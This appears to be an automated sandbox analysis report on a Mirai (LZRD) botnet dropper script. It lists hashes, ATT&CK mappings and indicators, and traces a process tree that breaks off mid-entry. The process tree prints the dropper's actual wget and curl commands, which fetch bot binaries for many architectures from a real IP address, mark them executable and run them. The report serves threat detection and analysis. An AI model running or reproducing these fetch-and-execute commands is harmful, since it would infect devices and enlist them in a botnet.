mirai | 4f1c0d593b90f06aadb41e43d72dabe8a57d52df99bdfbf67db6e2e3aecdfdcf

Analysis

max time kernel
148s
max time network
153s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
21-01-2025 21:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ohshit.sh
Size

3KB
MD5

d91a756fa0b51d26ca560e689c65f02a
SHA1

dca13e8c0ff369c8850b09e06eb9aecde38da7ad
SHA256

4f1c0d593b90f06aadb41e43d72dabe8a57d52df99bdfbf67db6e2e3aecdfdcf
SHA512

5386d2bb591a257c64e71563c16435bf9f606d813031417233700d22e0b31bad1f33f73ae7ef581033c3c1633ca9b897d162a64019fc415ba6d9505a7b7f8533

Score

10^/10

mirai lzrd botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 15 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1502	chmod
1534	chmod
1552	chmod
1630	chmod
1638	chmod
1494	chmod
1518	chmod
1526	chmod
1592	chmod
1606	chmod
1622	chmod
1573	chmod
1614	chmod
1542	chmod
1646	chmod

Executes dropped EXE 15 IoCs

ioc	pid	Process
/tmp/oqweoqeqq	1495	oqweoqeqq
/tmp/oqweoqeqq	1503	oqweoqeqq
/tmp/oqweoqeqq	1519	oqweoqeqq
/tmp/oqweoqeqq	1527	oqweoqeqq
/tmp/oqweoqeqq	1535	oqweoqeqq
/tmp/oqweoqeqq	1543	oqweoqeqq
/tmp/oqweoqeqq	1553	oqweoqeqq
/tmp/oqweoqeqq	1574	oqweoqeqq
/tmp/oqweoqeqq	1593	oqweoqeqq
/tmp/oqweoqeqq	1607	oqweoqeqq
/tmp/oqweoqeqq	1615	oqweoqeqq
/tmp/oqweoqeqq	1623	oqweoqeqq
/tmp/oqweoqeqq	1631	oqweoqeqq
/tmp/oqweoqeqq	1639	oqweoqeqq
/tmp/oqweoqeqq	1647	oqweoqeqq

Modifies Watchdog functionality 1 TTPs 30 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	oqweoqeqq
File opened for modification	/dev/watchdog	oqweoqeqq
File opened for modification	/dev/watchdog	oqweoqeqq
File opened for modification	/dev/misc/watchdog	oqweoqeqq
File opened for modification	/dev/watchdog	oqweoqeqq
File opened for modification	/dev/misc/watchdog	oqweoqeqq
File opened for modification	/dev/watchdog	oqweoqeqq
File opened for modification	/dev/watchdog	oqweoqeqq
File opened for modification	/dev/misc/watchdog	oqweoqeqq
File opened for modification	/dev/misc/watchdog	oqweoqeqq
File opened for modification	/dev/misc/watchdog	oqweoqeqq
File opened for modification	/dev/misc/watchdog	oqweoqeqq
File opened for modification	/dev/watchdog	oqweoqeqq
File opened for modification	/dev/watchdog	oqweoqeqq
File opened for modification	/dev/watchdog	oqweoqeqq
File opened for modification	/dev/misc/watchdog	oqweoqeqq
File opened for modification	/dev/misc/watchdog	oqweoqeqq
File opened for modification	/dev/misc/watchdog	oqweoqeqq
File opened for modification	/dev/misc/watchdog	oqweoqeqq
File opened for modification	/dev/misc/watchdog	oqweoqeqq
File opened for modification	/dev/watchdog	oqweoqeqq
File opened for modification	/dev/misc/watchdog	oqweoqeqq
File opened for modification	/dev/watchdog	oqweoqeqq
File opened for modification	/dev/watchdog	oqweoqeqq
File opened for modification	/dev/misc/watchdog	oqweoqeqq
File opened for modification	/dev/watchdog	oqweoqeqq
File opened for modification	/dev/misc/watchdog	oqweoqeqq
File opened for modification	/dev/watchdog	oqweoqeqq
File opened for modification	/dev/misc/watchdog	oqweoqeqq
File opened for modification	/dev/watchdog	oqweoqeqq

Enumerates running processes
Discovers information about currently running processes on the system

Writes file to system bin folder 30 IoCs

description	ioc	Process
File opened for modification	/sbin/watchdog	oqweoqeqq
File opened for modification	/sbin/watchdog	oqweoqeqq
File opened for modification	/bin/watchdog	oqweoqeqq
File opened for modification	/sbin/watchdog	oqweoqeqq
File opened for modification	/bin/watchdog	oqweoqeqq
File opened for modification	/sbin/watchdog	oqweoqeqq
File opened for modification	/bin/watchdog	oqweoqeqq
File opened for modification	/bin/watchdog	oqweoqeqq
File opened for modification	/sbin/watchdog	oqweoqeqq
File opened for modification	/sbin/watchdog	oqweoqeqq
File opened for modification	/bin/watchdog	oqweoqeqq
File opened for modification	/sbin/watchdog	oqweoqeqq
File opened for modification	/bin/watchdog	oqweoqeqq
File opened for modification	/sbin/watchdog	oqweoqeqq
File opened for modification	/bin/watchdog	oqweoqeqq
File opened for modification	/sbin/watchdog	oqweoqeqq
File opened for modification	/sbin/watchdog	oqweoqeqq
File opened for modification	/sbin/watchdog	oqweoqeqq
File opened for modification	/bin/watchdog	oqweoqeqq
File opened for modification	/sbin/watchdog	oqweoqeqq
File opened for modification	/sbin/watchdog	oqweoqeqq
File opened for modification	/bin/watchdog	oqweoqeqq
File opened for modification	/sbin/watchdog	oqweoqeqq
File opened for modification	/bin/watchdog	oqweoqeqq
File opened for modification	/bin/watchdog	oqweoqeqq
File opened for modification	/sbin/watchdog	oqweoqeqq
File opened for modification	/bin/watchdog	oqweoqeqq
File opened for modification	/bin/watchdog	oqweoqeqq
File opened for modification	/bin/watchdog	oqweoqeqq
File opened for modification	/bin/watchdog	oqweoqeqq

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/fstream-1.dat	upx

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/1037/cmdline	oqweoqeqq
File opened for reading	/proc/586/cmdline	oqweoqeqq
File opened for reading	/proc/1179/cmdline	oqweoqeqq
File opened for reading	/proc/515/cmdline	oqweoqeqq
File opened for reading	/proc/1634/cmdline	oqweoqeqq
File opened for reading	/proc/1610/cmdline	oqweoqeqq
File opened for reading	/proc/1275/cmdline	oqweoqeqq
File opened for reading	/proc/1650/cmdline	oqweoqeqq
File opened for reading	/proc/659/cmdline	oqweoqeqq
File opened for reading	/proc/1522/cmdline	oqweoqeqq
File opened for reading	/proc/958/cmdline	oqweoqeqq
File opened for reading	/proc/588/cmdline	oqweoqeqq
File opened for reading	/proc/1294/cmdline	oqweoqeqq
File opened for reading	/proc/407/cmdline	oqweoqeqq
File opened for reading	/proc/1496/cmdline	oqweoqeqq
File opened for reading	/proc/1477/cmdline	oqweoqeqq
File opened for reading	/proc/1522/cmdline	oqweoqeqq
File opened for reading	/proc/432/cmdline	oqweoqeqq
File opened for reading	/proc/444/cmdline	oqweoqeqq
File opened for reading	/proc/1339/cmdline	oqweoqeqq
File opened for reading	/proc/1031/cmdline	oqweoqeqq
File opened for reading	/proc/1255/cmdline	oqweoqeqq
File opened for reading	/proc/704/cmdline	oqweoqeqq
File opened for reading	/proc/1536/cmdline	oqweoqeqq
File opened for reading	/proc/1150/cmdline	oqweoqeqq
File opened for reading	/proc/1626/cmdline	oqweoqeqq
File opened for reading	/proc/1240/cmdline	oqweoqeqq
File opened for reading	/proc/406/cmdline	oqweoqeqq
File opened for reading	/proc/451/cmdline	oqweoqeqq
File opened for reading	/proc/1097/cmdline	oqweoqeqq
File opened for reading	/proc/1575/cmdline	oqweoqeqq
File opened for reading	/proc/1648/cmdline	oqweoqeqq
File opened for reading	/proc/1544/cmdline	oqweoqeqq
File opened for reading	/proc/438/cmdline	oqweoqeqq
File opened for reading	/proc/506/cmdline	oqweoqeqq
File opened for reading	/proc/1179/cmdline	oqweoqeqq
File opened for reading	/proc/588/cmdline	oqweoqeqq
File opened for reading	/proc/648/cmdline	oqweoqeqq
File opened for reading	/proc/1276/cmdline	oqweoqeqq
File opened for reading	/proc/1650/cmdline	oqweoqeqq
File opened for reading	/proc/436/cmdline	oqweoqeqq
File opened for reading	/proc/1522/cmdline	oqweoqeqq
File opened for reading	/proc/471/cmdline	oqweoqeqq
File opened for reading	/proc/415/cmdline	oqweoqeqq
File opened for reading	/proc/1137/cmdline	oqweoqeqq
File opened for reading	/proc/1473/cmdline	oqweoqeqq
File opened for reading	/proc/1554/cmdline	oqweoqeqq
File opened for reading	/proc/1142/cmdline	oqweoqeqq
File opened for reading	/proc/1056/cmdline	oqweoqeqq
File opened for reading	/proc/1504/cmdline	oqweoqeqq
File opened for reading	/proc/434/cmdline	oqweoqeqq
File opened for reading	/proc/1054/cmdline	oqweoqeqq
File opened for reading	/proc/1544/cmdline	oqweoqeqq
File opened for reading	/proc/1312/cmdline	oqweoqeqq
File opened for reading	/proc/1642/cmdline	oqweoqeqq
File opened for reading	/proc/1115/cmdline	oqweoqeqq
File opened for reading	/proc/1498/cmdline	oqweoqeqq
File opened for reading	/proc/1608/cmdline	oqweoqeqq
File opened for reading	/proc/1132/cmdline	oqweoqeqq
File opened for reading	/proc/1294/cmdline	oqweoqeqq
File opened for reading	/proc/1056/cmdline	oqweoqeqq
File opened for reading	/proc/1594/cmdline	oqweoqeqq
File opened for reading	/proc/1123/cmdline	oqweoqeqq
File opened for reading	/proc/1174/cmdline	oqweoqeqq

System Network Configuration Discovery 1 TTPs 2 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1499	wget
1500	curl

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/uqwodquojqoqdo.x86	wget
File opened for modification	/tmp/uqwodquojqoqdo.arc	curl
File opened for modification	/tmp/uqwodquojqoqdo.spc	curl
File opened for modification	/tmp/uqwodquojqoqdo.m68k	wget
File opened for modification	/tmp/uqwodquojqoqdo.sh4	wget
File opened for modification	/tmp/uqwodquojqoqdo.spc	wget
File opened for modification	/tmp/uqwodquojqoqdo.m68k	curl
File opened for modification	/tmp/uqwodquojqoqdo.sh4	curl
File opened for modification	/tmp/uqwodquojqoqdo.mips	curl
File opened for modification	/tmp/uqwodquojqoqdo.i686	curl
File opened for modification	/tmp/uqwodquojqoqdo.mpsl	wget
File opened for modification	/tmp/uqwodquojqoqdo.arm	curl
File opened for modification	/tmp/uqwodquojqoqdo.arm6	wget
File opened for modification	/tmp/uqwodquojqoqdo.arm6	curl
File opened for modification	/tmp/uqwodquojqoqdo.x86	curl
File opened for modification	/tmp/uqwodquojqoqdo.arc	wget
File opened for modification	/tmp/uqwodquojqoqdo.arm5	curl
File opened for modification	/tmp/uqwodquojqoqdo.ppc	curl
File opened for modification	/tmp/uqwodquojqoqdo.mips	wget
File opened for modification	/tmp/uqwodquojqoqdo.x86_64	curl
File opened for modification	/tmp/uqwodquojqoqdo.mpsl	curl
File opened for modification	/tmp/uqwodquojqoqdo.arm	wget
File opened for modification	/tmp/uqwodquojqoqdo.arm7	wget
File opened for modification	/tmp/oqweoqeqq	ohshit.sh
File opened for modification	/tmp/uqwodquojqoqdo.i468	curl
File opened for modification	/tmp/uqwodquojqoqdo.arm5	wget
File opened for modification	/tmp/uqwodquojqoqdo.arm7	curl
File opened for modification	/tmp/uqwodquojqoqdo.ppc	wget

/tmp/ohshit.sh
/tmp/ohshit.sh
1⤵
- Writes file to tmp directory
PID:1487
- /usr/bin/wget
  wget http://107.172.51.228/hiddenbin/uqwodquojqoqdo.x86
  2⤵
  - Writes file to tmp directory
  PID:1488
- /usr/bin/curl
  curl -O http://107.172.51.228/hiddenbin/uqwodquojqoqdo.x86
  2⤵
  - Writes file to tmp directory
  PID:1492
- /bin/cat
  cat uqwodquojqoqdo.x86
  2⤵
  PID:1493
- /bin/chmod
  chmod +x config-err-TtKvLo netplan_vobrtjej ohshit.sh oqweoqeqq snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JBGpC1 uqwodquojqoqdo.x86
  2⤵
  - File and Directory Permissions Modification
  PID:1494
- /tmp/oqweoqeqq
  ./oqweoqeqq
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1495
- /usr/bin/wget
  wget http://107.172.51.228/hiddenbin/uqwodquojqoqdo.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1499
- /usr/bin/curl
  curl -O http://107.172.51.228/hiddenbin/uqwodquojqoqdo.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1500
- /bin/chmod
  chmod +x config-err-TtKvLo netplan_vobrtjej ohshit.sh oqweoqeqq snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JBGpC1 uqwodquojqoqdo.mips uqwodquojqoqdo.x86
  2⤵
  - File and Directory Permissions Modification
  PID:1502
- /tmp/oqweoqeqq
  ./oqweoqeqq
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1503
- /usr/bin/wget
  wget http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arc
  2⤵
  - Writes file to tmp directory
  PID:1507
- /usr/bin/curl
  curl -O http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arc
  2⤵
  - Writes file to tmp directory
  PID:1516
- /bin/chmod
  chmod +x config-err-TtKvLo netplan_vobrtjej ohshit.sh oqweoqeqq snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JBGpC1 uqwodquojqoqdo.arc uqwodquojqoqdo.mips uqwodquojqoqdo.x86
  2⤵
  - File and Directory Permissions Modification
  PID:1518
- /tmp/oqweoqeqq
  ./oqweoqeqq
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1519
- /usr/bin/wget
  wget http://107.172.51.228/hiddenbin/uqwodquojqoqdo.i468
  2⤵
  PID:1523
- /usr/bin/curl
  curl -O http://107.172.51.228/hiddenbin/uqwodquojqoqdo.i468
  2⤵
  - Writes file to tmp directory
  PID:1524
- /bin/chmod
  chmod +x config-err-TtKvLo netplan_vobrtjej ohshit.sh oqweoqeqq snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JBGpC1 uqwodquojqoqdo.arc uqwodquojqoqdo.i468 uqwodquojqoqdo.mips uqwodquojqoqdo.x86
  2⤵
  - File and Directory Permissions Modification
  PID:1526
- /tmp/oqweoqeqq
  ./oqweoqeqq
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1527
- /usr/bin/wget
  wget http://107.172.51.228/hiddenbin/uqwodquojqoqdo.i686
  2⤵
  PID:1531
- /usr/bin/curl
  curl -O http://107.172.51.228/hiddenbin/uqwodquojqoqdo.i686
  2⤵
  - Writes file to tmp directory
  PID:1532
- /bin/chmod
  chmod +x config-err-TtKvLo netplan_vobrtjej ohshit.sh oqweoqeqq snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JBGpC1 uqwodquojqoqdo.arc uqwodquojqoqdo.i468 uqwodquojqoqdo.i686 uqwodquojqoqdo.mips uqwodquojqoqdo.x86
  2⤵
  - File and Directory Permissions Modification
  PID:1534
- /tmp/oqweoqeqq
  ./oqweoqeqq
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1535
- /usr/bin/wget
  wget http://107.172.51.228/hiddenbin/uqwodquojqoqdo.x86_64
  2⤵
  PID:1539
- /usr/bin/curl
  curl -O http://107.172.51.228/hiddenbin/uqwodquojqoqdo.x86_64
  2⤵
  - Writes file to tmp directory
  PID:1540
- /bin/chmod
  chmod +x config-err-TtKvLo netplan_vobrtjej ohshit.sh oqweoqeqq snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JBGpC1 uqwodquojqoqdo.arc uqwodquojqoqdo.i468 uqwodquojqoqdo.i686 uqwodquojqoqdo.mips uqwodquojqoqdo.x86 uqwodquojqoqdo.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1542
- /tmp/oqweoqeqq
  ./oqweoqeqq
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1543
- /usr/bin/wget
  wget http://107.172.51.228/hiddenbin/uqwodquojqoqdo.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1547
- /usr/bin/curl
  curl -O http://107.172.51.228/hiddenbin/uqwodquojqoqdo.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1548
- /bin/chmod
  chmod +x config-err-TtKvLo netplan_vobrtjej ohshit.sh oqweoqeqq snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JBGpC1 uqwodquojqoqdo.arc uqwodquojqoqdo.i468 uqwodquojqoqdo.i686 uqwodquojqoqdo.mips uqwodquojqoqdo.mpsl uqwodquojqoqdo.x86 uqwodquojqoqdo.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1552
- /tmp/oqweoqeqq
  ./oqweoqeqq
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1553
- /usr/bin/wget
  wget http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm
  2⤵
  - Writes file to tmp directory
  PID:1557
- /usr/bin/curl
  curl -O http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm
  2⤵
  - Writes file to tmp directory
  PID:1568
- /bin/chmod
  chmod +x config-err-TtKvLo netplan_vobrtjej ohshit.sh oqweoqeqq snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-J7Cnpv systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JBGpC1 uqwodquojqoqdo.arc uqwodquojqoqdo.arm uqwodquojqoqdo.i468 uqwodquojqoqdo.i686 uqwodquojqoqdo.mips uqwodquojqoqdo.mpsl uqwodquojqoqdo.x86 uqwodquojqoqdo.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1573
- /tmp/oqweoqeqq
  ./oqweoqeqq
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1574
- /usr/bin/wget
  wget http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm5
  2⤵
  - Writes file to tmp directory
  PID:1578
- /usr/bin/curl
  curl -O http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm5
  2⤵
  - Writes file to tmp directory
  PID:1584
- /bin/chmod
  chmod +x config-err-TtKvLo netplan_vobrtjej ohshit.sh oqweoqeqq snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JBGpC1 uqwodquojqoqdo.arc uqwodquojqoqdo.arm uqwodquojqoqdo.arm5 uqwodquojqoqdo.i468 uqwodquojqoqdo.i686 uqwodquojqoqdo.mips uqwodquojqoqdo.mpsl uqwodquojqoqdo.x86 uqwodquojqoqdo.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1592
- /tmp/oqweoqeqq
  ./oqweoqeqq
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1593
- /usr/bin/wget
  wget http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm6
  2⤵
  - Writes file to tmp directory
  PID:1597
- /usr/bin/curl
  curl -O http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm6
  2⤵
  - Writes file to tmp directory
  PID:1604
- /bin/chmod
  chmod +x config-err-TtKvLo netplan_vobrtjej ohshit.sh oqweoqeqq snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JBGpC1 uqwodquojqoqdo.arc uqwodquojqoqdo.arm uqwodquojqoqdo.arm5 uqwodquojqoqdo.arm6 uqwodquojqoqdo.i468 uqwodquojqoqdo.i686 uqwodquojqoqdo.mips uqwodquojqoqdo.mpsl uqwodquojqoqdo.x86 uqwodquojqoqdo.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1606
- /tmp/oqweoqeqq
  ./oqweoqeqq
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1607
- /usr/bin/wget
  wget http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm7
  2⤵
  - Writes file to tmp directory
  PID:1611
- /usr/bin/curl
  curl -O http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm7
  2⤵
  - Writes file to tmp directory
  PID:1612
- /bin/chmod
  chmod +x config-err-TtKvLo netplan_vobrtjej ohshit.sh oqweoqeqq snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JBGpC1 uqwodquojqoqdo.arc uqwodquojqoqdo.arm uqwodquojqoqdo.arm5 uqwodquojqoqdo.arm6 uqwodquojqoqdo.arm7 uqwodquojqoqdo.i468 uqwodquojqoqdo.i686 uqwodquojqoqdo.mips uqwodquojqoqdo.mpsl uqwodquojqoqdo.x86 uqwodquojqoqdo.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1614
- /tmp/oqweoqeqq
  ./oqweoqeqq
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1615
- /usr/bin/wget
  wget http://107.172.51.228/hiddenbin/uqwodquojqoqdo.ppc
  2⤵
  - Writes file to tmp directory
  PID:1619
- /usr/bin/curl
  curl -O http://107.172.51.228/hiddenbin/uqwodquojqoqdo.ppc
  2⤵
  - Writes file to tmp directory
  PID:1620
- /bin/chmod
  chmod +x config-err-TtKvLo netplan_vobrtjej ohshit.sh oqweoqeqq snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JBGpC1 uqwodquojqoqdo.arc uqwodquojqoqdo.arm uqwodquojqoqdo.arm5 uqwodquojqoqdo.arm6 uqwodquojqoqdo.arm7 uqwodquojqoqdo.i468 uqwodquojqoqdo.i686 uqwodquojqoqdo.mips uqwodquojqoqdo.mpsl uqwodquojqoqdo.ppc uqwodquojqoqdo.x86 uqwodquojqoqdo.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1622
- /tmp/oqweoqeqq
  ./oqweoqeqq
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1623
- /usr/bin/wget
  wget http://107.172.51.228/hiddenbin/uqwodquojqoqdo.spc
  2⤵
  - Writes file to tmp directory
  PID:1627
- /usr/bin/curl
  curl -O http://107.172.51.228/hiddenbin/uqwodquojqoqdo.spc
  2⤵
  - Writes file to tmp directory
  PID:1628
- /bin/chmod
  chmod +x config-err-TtKvLo netplan_vobrtjej ohshit.sh oqweoqeqq snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JBGpC1 uqwodquojqoqdo.arc uqwodquojqoqdo.arm uqwodquojqoqdo.arm5 uqwodquojqoqdo.arm6 uqwodquojqoqdo.arm7 uqwodquojqoqdo.i468 uqwodquojqoqdo.i686 uqwodquojqoqdo.mips uqwodquojqoqdo.mpsl uqwodquojqoqdo.ppc uqwodquojqoqdo.spc uqwodquojqoqdo.x86 uqwodquojqoqdo.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1630
- /tmp/oqweoqeqq
  ./oqweoqeqq
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1631
- /usr/bin/wget
  wget http://107.172.51.228/hiddenbin/uqwodquojqoqdo.m68k
  2⤵
  - Writes file to tmp directory
  PID:1635
- /usr/bin/curl
  curl -O http://107.172.51.228/hiddenbin/uqwodquojqoqdo.m68k
  2⤵
  - Writes file to tmp directory
  PID:1636
- /bin/chmod
  chmod +x config-err-TtKvLo netplan_vobrtjej ohshit.sh oqweoqeqq snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JBGpC1 uqwodquojqoqdo.arc uqwodquojqoqdo.arm uqwodquojqoqdo.arm5 uqwodquojqoqdo.arm6 uqwodquojqoqdo.arm7 uqwodquojqoqdo.i468 uqwodquojqoqdo.i686 uqwodquojqoqdo.m68k uqwodquojqoqdo.mips uqwodquojqoqdo.mpsl uqwodquojqoqdo.ppc uqwodquojqoqdo.spc uqwodquojqoqdo.x86 uqwodquojqoqdo.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1638
- /tmp/oqweoqeqq
  ./oqweoqeqq
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1639
- /usr/bin/wget
  wget http://107.172.51.228/hiddenbin/uqwodquojqoqdo.sh4
  2⤵
  - Writes file to tmp directory
  PID:1643
- /usr/bin/curl
  curl -O http://107.172.51.228/hiddenbin/uqwodquojqoqdo.sh4
  2⤵
  - Writes file to tmp directory
  PID:1644
- /bin/chmod
